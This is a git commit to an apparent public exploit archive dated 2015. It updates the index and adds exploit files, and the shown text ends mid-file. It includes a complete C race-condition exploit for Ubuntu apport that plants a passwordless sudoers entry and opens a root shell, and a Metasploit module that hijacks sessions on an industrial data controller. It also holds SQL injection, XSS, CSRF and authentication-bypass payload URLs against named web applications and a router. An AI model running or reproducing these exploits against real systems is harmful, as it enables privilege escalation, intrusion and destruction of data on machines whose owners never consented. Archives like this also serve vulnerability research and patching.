DB: 2015-05-30
17 new exploits
This commit is contained in:
parent
3f78695204
commit
0b3f393d50
18 changed files with 799 additions and 0 deletions
17
files.csv
17
files.csv
|
@ -33457,6 +33457,7 @@ id,file,description,date,author,platform,type,port
|
|||
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
|
||||
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
|
||||
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
|
||||
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -33470,6 +33471,7 @@ id,file,description,date,author,platform,type,port
|
|||
37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
|
||||
37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
|
||||
37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
|
||||
37088,platforms/linux/local/37088.c,"Apport/Ubuntu - Local Root Race Condition",2015-05-23,rebel,linux,local,0
|
||||
37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
|
||||
37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal Vulnerability",2012-04-17,indoushka,php,webapps,0
|
||||
37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 'UserName' Parameter Cross Site Scripting Vulnerability",2012-04-17,"Aung Khant",php,webapps,0
|
||||
|
@ -33515,3 +33517,18 @@ id,file,description,date,author,platform,type,port
|
|||
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0
|
||||
37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0
|
||||
37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x 'photo.php' Server SQL Injection Vulnerability",2012-05-07,"Ramdan Yantu",php,webapps,0
|
||||
37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 'kw.dll' HTML Injection Vulnerability",2012-05-06,phocean,php,webapps,0
|
||||
37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross Site Scripting Vulnerability",2012-05-07,3spi0n,php,webapps,0
|
||||
37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 'Login_form.php' Authentication Security Bypass Vulnerability",2012-05-07,L3b-r1'z,php,webapps,0
|
||||
37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 'banners.php' PHP Code Injection Vulnerability",2012-05-08,L3b-r1'z,php,webapps,0
|
||||
37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery Vulnerability",2012-05-08,Kalashinkov3,hardware,remote,0
|
||||
37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC index.php uri Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting Vulnerability",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
|
||||
37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
|
||||
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
|
||||
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
7
platforms/hardware/remote/37141.txt
Executable file
7
platforms/hardware/remote/37141.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/53427/info
|
||||
|
||||
The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
|
||||
|
||||
submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1
|
167
platforms/hardware/webapps/37154.rb
Executable file
167
platforms/hardware/webapps/37154.rb
Executable file
|
@ -0,0 +1,167 @@
|
|||
=begin
|
||||
# Exploit Title: ESC 8832 Data Controller multiple vulnerabilities
|
||||
# Date: 2014-05-29
|
||||
# Platform: SCADA / Web Application
|
||||
# Exploit Author: Balazs Makany
|
||||
# Vendor Homepage: www.envirosys.com
|
||||
# Version: ESC 8832 Data Controller Hardware
|
||||
# Tested on: ESC 8832 Data Controller Hardware
|
||||
# CVE : N/A (Yet)
|
||||
|
||||
POC for session hijacking: From the attacker browser (unauthenticated),
|
||||
simply enter the following URL:
|
||||
http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and increment the
|
||||
sessionid parameter, starting from 1 up until it makes sense.
|
||||
|
||||
POC (and other vulns as well) was confirmed by the vendor
|
||||
Metasploit auxiliary module available at
|
||||
https://www.th3r3g3nt.com/public_files/esc_8832_session.rb
|
||||
|
||||
Details
|
||||
[1] Insecure user session handling (Session Hijacking)
|
||||
Summary: This vulnerability allows an attacker to hijack a valid session
|
||||
that is in progress by a legitimate user.
|
||||
Details: Due to the predictable session generation and due to the lack of
|
||||
cookie based authentication in the web interface, it was confirmed that an
|
||||
attacker from a different source IP address can issue valid requests,
|
||||
impersonating the authenticated user. The attack complexity is very low, no
|
||||
special software is required. It was noted that valid sessions do time out
|
||||
after certain period of inactivity, however hijacked sessions can
|
||||
elongating the session validity.
|
||||
Impact: The attacker can bypass intended access restrictions and
|
||||
impersonate currently active users, including administrators. Successful
|
||||
exploitation will result in complete loss of control over the device, and
|
||||
may depend on the compromised user context.
|
||||
POC: From a browser, simply enter the following URL:
|
||||
http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and modify the
|
||||
sessionid parameter, starting from 1 up until it makes sense. Typically 15
|
||||
is high enough.
|
||||
|
||||
[2] Insecure user session generation (Predictable user session generation)
|
||||
Summary: This vulnerability aids attackers to perform session hijacking
|
||||
Details: Upon successful authentication, the generated session ID are
|
||||
sequential in nature and starts at 1. For example if no user is
|
||||
authenticated, the first user who authenticates will receive the session ID
|
||||
1. The next authenticated user will receive session ID 2 and so on. There
|
||||
is also seems to be a “read-only” / unknown behavior when user ID 0 is
|
||||
supplied. Negative, invalid and other fuzzable values were not tested.
|
||||
Impact: Successful exploitation will allow remote attackers to determine
|
||||
valid sessions, leading to session hijacking and can result in complete
|
||||
loss of control over the device.
|
||||
POC: N/A, confirmed by vendor
|
||||
|
||||
[3] Insecure user authentication method (Unencrypted protocol)
|
||||
Summary: This vulnerability allows man-in-the-middle attackers to gain
|
||||
valid cleartext credentials
|
||||
Details: The device is only capable of HTTP based authentication, which
|
||||
doesn’t seem to offer encryption such as HTTPS. Note that the native
|
||||
end-point client shipped with the device was not tested.
|
||||
Impact: Man-in-the-middle attackers are able to sniff cleartext
|
||||
authentication credentials between the user and the device. Successful
|
||||
exploitation may result in partial or complete loss of control over the
|
||||
device, depending on the compromised user context.
|
||||
POC: N/A, see web interface open ports and protocols
|
||||
|
||||
[4] Insecure user management (Lack of user names)
|
||||
Summary: This vulnerability significantly decreases the complexity
|
||||
requirements for bruteforce attacks
|
||||
Details: The web interface does not require a username to be entered in
|
||||
conjunction with the password; only the password drives the user role.
|
||||
Impact: Attackers can have significantly higher success rate for password
|
||||
bruteforcing. Successful exploitation may result in partial or complete
|
||||
loss of control over the device, depending on the compromised user context.
|
||||
POC: N/A, confirmed by vendor, inspect login screen
|
||||
|
||||
[5] Insecure user session token transmission (Session token in HTTP GET)
|
||||
Summary: Session tokens are transmitted via HTTP GET request in unhashed
|
||||
form
|
||||
Details: Upon successful authentication, the session ID is being sent in
|
||||
the URL GET request. (http[nolink]://
|
||||
192.168.1.1/escmenu.esp?sessionid=1&menuid=6)
|
||||
Impact: Man-in-the-middle attackers and caching devices (proxies, routers
|
||||
with spanning ports, loggers, browser history, IDS/IPS etc.) can
|
||||
effectively capture valid session IDs. The session ID transmitted in the
|
||||
GET request is vulnerable to session hijacking. Successful exploitation may
|
||||
result in partial or complete loss of control over the device, depending on
|
||||
the compromised user context.
|
||||
POC: N/A, confirmed by vendor
|
||||
=end
|
||||
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'ESC 8832 Data Controller Session Hijack Scanner',
|
||||
'Description' => %q{ This module detects if an active session is present and hijackable on the target ESC 8832 web interface.},
|
||||
'Author' => ['Balazs Makany'],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.th3r3g3nt.com/?p=28'],
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(80),
|
||||
OptBool.new('STOP_ON_SUCCESS', [true, "Stop when a live session was found", true]),
|
||||
])
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
result = []
|
||||
begin
|
||||
('1'.. '15').each do |u|
|
||||
print_status("Scanning #{target_host} - with Session ID '#{u}'")
|
||||
|
||||
#Just to be on the safe side here.
|
||||
sleep(1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/escmenu.esp?sessionid='+u+'&menuid=6',
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Connection' => 'Close' }
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200 and res.body)
|
||||
if res.body.match(/(Configuration\sMenu)/im)
|
||||
print_good("#{target_host} - Active Session found as #{u}!")
|
||||
print_good("Complete request: http://#{target_host}/escmenu.esp?sessionid=#{u}&menuid=6")
|
||||
report_vuln(
|
||||
{
|
||||
:host => target_host,
|
||||
:port => datastore['RPORT'],
|
||||
:name => "ESC 8832 Web Vulnerability",
|
||||
:info => "Module #{self.fullname} confirmed a valid session (#{u}) on the ESC 8832 Web Interface",
|
||||
}
|
||||
)
|
||||
break if datastore['STOP_ON_SUCCESS']
|
||||
end
|
||||
if res.body.match(/(Access\sDenied!)/im)
|
||||
print_status(" Dead session")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("Timeout or no connection on #{rhost}:#{rport}")
|
||||
return
|
||||
rescue ::Exception => e
|
||||
print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
157
platforms/jsp/webapps/37152.txt
Executable file
157
platforms/jsp/webapps/37152.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
# Exploit Title: JSPMyAdmin 1.1 SQL Injection, CSRF & XSS
|
||||
# Google Dork: intitle:SQL Injection
|
||||
# Date: 2015-05-29
|
||||
# Exploit Author: John Page (hyp3rlinx)
|
||||
# Website: hyp3rlinx.altervista.org/
|
||||
# Vendor Homepage: https://code.google.com/p/jsp-myadmin/
|
||||
# Software Link: https://code.google.com/p/jsp-myadmin/
|
||||
# Version: 1.1
|
||||
# Tested on: windows 7
|
||||
# Category: webapps
|
||||
|
||||
Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt
|
||||
|
||||
|
||||
Product:
|
||||
JSPAdmin 1.1 is a Java web based MySQL database management system.
|
||||
|
||||
|
||||
Advisory Information:
|
||||
================================================
|
||||
JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities
|
||||
|
||||
|
||||
SQL Injection
|
||||
CSRF
|
||||
XSS
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
SQL Injection:
|
||||
deletedata.jsp is supposed to delete 1 field per query, yet we can control
|
||||
the SQL and build an OR condition.
|
||||
Problem is application uses concatenated user input to build SQL statements
|
||||
even though paramaterized queries are used.
|
||||
|
||||
In deletedata.jsp we find the following code:
|
||||
|
||||
con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val
|
||||
+"'");
|
||||
|
||||
So expected SQL to be run is this deleting 1 record.
|
||||
|
||||
e.g.
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
|
||||
|
||||
But the SQL Injection vulnerability lets us instead drop all fields using
|
||||
an SQL 'OR' statement.
|
||||
|
||||
e.g.
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
|
||||
or 'field'='NAME'
|
||||
|
||||
*************************************************************************************************
|
||||
|
||||
|
||||
CSRF:
|
||||
We can drop any database by sending victim malicious linx as there is no
|
||||
CSRF token used.
|
||||
*****************************************************************************************
|
||||
|
||||
|
||||
XSS:
|
||||
|
||||
There is zero user input checks allowing remote attackers to execute
|
||||
arbitrary scripts in the
|
||||
context of an authenticated user's browser session.
|
||||
***************************************************
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
SQL Injection POC:
|
||||
------------------
|
||||
|
||||
So expected SQL to be run is this deleting 1 record
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
|
||||
or 'field'='NAME'
|
||||
|
||||
|
||||
CSRF POC:
|
||||
---------
|
||||
http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb
|
||||
|
||||
|
||||
|
||||
XSS(s) POC:
|
||||
----------
|
||||
|
||||
1- </title><script>alert('XSS By hyp3rlinx');</script><title>
|
||||
Using POST method in 'host' parameter of login page.
|
||||
http://127.0.0.1:8081/JSPMyAdmin/
|
||||
|
||||
2- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db=
|
||||
"/><script>alert(666)</script>
|
||||
|
||||
3- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=
|
||||
"/><script>alert(666)</script>&db=
|
||||
|
||||
4- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db=
|
||||
"/><script>alert(666);</script>
|
||||
|
||||
5-
|
||||
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table=
|
||||
"/><script>alert(666);</script>
|
||||
|
||||
6- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=
|
||||
"/><script>alert(666);</script>&db=
|
||||
|
||||
7- http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server=
|
||||
"/><script>alert(666)</script>&db=
|
||||
|
||||
8- http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=
|
||||
<script>alert(666)</script>
|
||||
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
|
||||
|
||||
Vendor Notification: NA
|
||||
May 29, 2015: Public Disclosure
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
High
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
==========================================================
|
||||
|
||||
Request Method(s):
|
||||
[+] GET / POST
|
||||
|
||||
Vulnerable Product:
|
||||
[+] JSPMyAdmin 1.1
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] host, server, db, table
|
||||
|
||||
Affected Area(s):
|
||||
[+] Entire admin
|
||||
|
||||
===============================================================
|
||||
|
||||
(hyp3rlinx)
|
248
platforms/linux/local/37088.c
Executable file
248
platforms/linux/local/37088.c
Executable file
|
@ -0,0 +1,248 @@
|
|||
/*
|
||||
# Exploit Title: apport/ubuntu local root race condition
|
||||
# Date: 2015-05-11
|
||||
# Exploit Author: rebel
|
||||
# Version: ubuntu 14.04, 14.10, 15.04
|
||||
# Tested on: ubuntu 14.04, 14.10, 15.04
|
||||
# CVE : CVE-2015-1325
|
||||
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
CVE-2015-1325 / apport-pid-race.c
|
||||
apport race conditions
|
||||
|
||||
ubuntu local root
|
||||
tested on ubuntu server 14.04, 14.10, 15.04
|
||||
|
||||
core dropping bug also works on older versions, but you can't
|
||||
write arbitrary contents. on 12.04 /etc/logrotate.d might work,
|
||||
didn't check. sudo and cron will complain if you drop a real ELF
|
||||
core file in sudoers.d/cron.d
|
||||
|
||||
unpriv@ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race
|
||||
created /var/crash/_bin_sleep.1002.crash
|
||||
crasher: my pid is 1308
|
||||
apport stopped, pid = 1309
|
||||
getting pid 1308
|
||||
current pid = 1307..2500..5000..7500..10000........
|
||||
** child: current pid = 1308
|
||||
** child: executing /bin/su
|
||||
Password: sleeping 2s..
|
||||
|
||||
checker: mode 4532
|
||||
waiting for file to be unlinked..writing to fifo
|
||||
fifo written.. wait...
|
||||
waiting for /etc/sudoers.d/core to appear..
|
||||
|
||||
checker: new mode 32768 .. done
|
||||
checker: SIGCONT
|
||||
checker: writing core
|
||||
checker: done
|
||||
success
|
||||
# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
|
||||
85ad63cf7248d7da46e55fa1b1c6fe01dea43749
|
||||
2015-05-10
|
||||
%rebel%
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
*/
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/types.h>
|
||||
#include <signal.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
|
||||
char *crash_report = "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\nDate: Sat May 9 18:18:33 2015\nDistroRelease: Ubuntu 15.04\nExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\nProcCmdline: sleep 1337\nProcCwd: /home/rebel\nProcEnviron:\n XDG_RUNTIME_DIR=<set>\nProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 393307 /bin/sleep\nProcStatus:\n Name: sleep\nSignal: 11\nUname: Linux 3.19.0-15-generic x86_64\nUserGroups:\n_LogindSession: 23\nCoreDump: base64\n H4sICAAAAAAC/0NvcmVEdW1wAA==\n U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n";
|
||||
/*
|
||||
last line is the stuff we write to the corefile
|
||||
|
||||
c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)
|
||||
t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n'
|
||||
# need some non-ASCII bytes so it doesn't turn into a str()
|
||||
# which makes apport fail with the following error:
|
||||
# os.write(core_file, r['CoreDump'])
|
||||
# TypeError: 'str' does not support the buffer interface
|
||||
t = bytes(t,'latin1')
|
||||
c.compress(t)
|
||||
a = c.flush()
|
||||
import base64
|
||||
base64.b64encode(a)
|
||||
|
||||
# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='
|
||||
*/
|
||||
|
||||
int apport_pid;
|
||||
char report[128];
|
||||
|
||||
void steal_pid(int wanted_pid)
|
||||
{
|
||||
int x, pid;
|
||||
|
||||
pid = getpid();
|
||||
|
||||
fprintf(stderr,"getting pid %d\n", wanted_pid);
|
||||
fprintf(stderr,"current pid = %d..", pid);
|
||||
|
||||
for(x = 0; x < 500000; x++) {
|
||||
pid = fork();
|
||||
if(pid == 0) {
|
||||
pid = getpid();
|
||||
if(pid % 2500 == 0)
|
||||
fprintf(stderr,"%d..", pid);
|
||||
|
||||
if(pid == wanted_pid) {
|
||||
fprintf(stderr,"\n** child: current pid = %d\n", pid);
|
||||
fprintf(stderr,"** child: executing /bin/su\n");
|
||||
|
||||
execl("/bin/su", "su", NULL);
|
||||
}
|
||||
exit(0);
|
||||
return;
|
||||
}
|
||||
if(pid == wanted_pid)
|
||||
return;
|
||||
|
||||
wait(NULL);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
void checker(void)
|
||||
{
|
||||
struct stat s;
|
||||
int fd, mode, x;
|
||||
|
||||
stat(report, &s);
|
||||
|
||||
fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);
|
||||
|
||||
mode = s.st_mode;
|
||||
|
||||
while(1) {
|
||||
// poor man's pseudo-singlestepping
|
||||
kill(apport_pid, SIGCONT);
|
||||
kill(apport_pid, SIGSTOP);
|
||||
|
||||
// need to wait a bit for the signals to be handled,
|
||||
// otherwise we'll miss when the new report file is created
|
||||
for(x = 0; x < 100000; x++);
|
||||
|
||||
stat(report, &s);
|
||||
|
||||
if(s.st_mode != mode)
|
||||
break;
|
||||
}
|
||||
|
||||
fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);
|
||||
|
||||
unlink(report);
|
||||
mknod(report, S_IFIFO | 0666, 0);
|
||||
|
||||
fprintf(stderr,"checker: SIGCONT\n");
|
||||
kill(apport_pid, SIGCONT);
|
||||
|
||||
fprintf(stderr,"checker: writing core\n");
|
||||
|
||||
fd = open(report, O_WRONLY);
|
||||
write(fd, crash_report, strlen(crash_report));
|
||||
close(fd);
|
||||
fprintf(stderr,"checker: done\n");
|
||||
|
||||
while(1)
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
|
||||
|
||||
void crasher()
|
||||
{
|
||||
chdir("/etc/sudoers.d");
|
||||
|
||||
fprintf(stderr,"crasher: my pid is %d\n", getpid());
|
||||
|
||||
execl("/bin/sleep", "sleep", "1337", NULL);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
int main(void)
|
||||
{
|
||||
int pid, checker_pid, fd;
|
||||
struct rlimit limits;
|
||||
struct stat s;
|
||||
|
||||
limits.rlim_cur = RLIM_INFINITY;
|
||||
limits.rlim_max = RLIM_INFINITY;
|
||||
setrlimit(RLIMIT_CORE, &limits);
|
||||
|
||||
pid = fork();
|
||||
|
||||
if(pid == 0)
|
||||
crasher();
|
||||
|
||||
sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());
|
||||
|
||||
unlink(report);
|
||||
mknod(report, S_IFIFO | 0666, 0);
|
||||
|
||||
fprintf(stderr,"created %s\n", report);
|
||||
|
||||
usleep(300000);
|
||||
kill(pid, 11);
|
||||
apport_pid = pid + 1;
|
||||
// could check that pid+1 is actually apport here but it's
|
||||
// kind of likely
|
||||
fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);
|
||||
|
||||
usleep(300000);
|
||||
|
||||
kill(pid, 9);
|
||||
steal_pid(pid);
|
||||
sleep(1);
|
||||
|
||||
kill(apport_pid, SIGSTOP);
|
||||
|
||||
checker_pid = fork();
|
||||
|
||||
if(checker_pid == 0) {
|
||||
checker();
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(stderr,"sleeping 2s..\n");
|
||||
sleep(2);
|
||||
|
||||
fprintf(stderr,"writing to fifo\n");
|
||||
|
||||
fd = open(report, O_WRONLY);
|
||||
write(fd, crash_report, strlen(crash_report));
|
||||
close(fd);
|
||||
|
||||
fprintf(stderr,"fifo written.. wait...\n");
|
||||
fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");
|
||||
|
||||
while(1) {
|
||||
stat("/etc/sudoers.d/core", &s);
|
||||
if(s.st_size == 37)
|
||||
break;
|
||||
usleep(100000);
|
||||
}
|
||||
|
||||
fprintf(stderr,"success\n");
|
||||
kill(pid, 9);
|
||||
kill(checker_pid, 9);
|
||||
return system("sudo -- sh -c 'stty echo;sh -i'");
|
||||
}
|
9
platforms/php/webapps/37136.txt
Executable file
9
platforms/php/webapps/37136.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53398/info
|
||||
|
||||
Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Trombinoscope 3.5 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
|
12
platforms/php/webapps/37137.txt
Executable file
12
platforms/php/webapps/37137.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/53409/info
|
||||
|
||||
Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content.
|
||||
|
||||
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
The following products are affected:
|
||||
|
||||
Schneider Electric Telecontrol Kerweb versions prior to 3.0.1
|
||||
Schneider Electric Telecontrol Kerwin versions prior to 6.0.1
|
||||
|
||||
http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=>variablevalue=<variablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=>dateapp=<dateapp=>daterec=<daterec=&evtvariablename=[XSS]
|
7
platforms/php/webapps/37138.txt
Executable file
7
platforms/php/webapps/37138.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/53411/info
|
||||
|
||||
Ramui Forum Script is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
|
9
platforms/php/webapps/37139.txt
Executable file
9
platforms/php/webapps/37139.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53413/info
|
||||
|
||||
JibberBook is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
|
||||
|
||||
Attackers can exploit this issue to bypass authentication to gain administrative privileges ; this may aid in launching further attacks.
|
||||
|
||||
JibberBook 2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/Admin/Login_form.php?loggedin=true
|
15
platforms/php/webapps/37140.html
Executable file
15
platforms/php/webapps/37140.html
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53426/info
|
||||
|
||||
